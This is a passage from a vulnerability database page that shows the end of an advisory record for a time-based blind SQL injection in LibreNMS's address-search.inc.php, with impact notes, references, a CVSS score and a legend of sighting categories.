sensitive application data.\n* An attacker can retrieve privileged accounts (e.g. administrative usernames) and their associated password hashes, potentially leading to privilege escalation within LibreNMS by cracking the password hashes and obtaining plaintext admin user credentials.",
"id": "GHSA-79q9-wc6p-cf92",
"modified": "2026-02-18T22:31:37Z",
"published": "2026-02-18T22:31:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92"
},
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/pull/18777"
},
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1"
},
{
"type": "PACKAGE",
"url": "https://github.com/librenms/librenms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "LibreNMS has a Time-Based Blind SQL Injection in address-search.inc.php"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…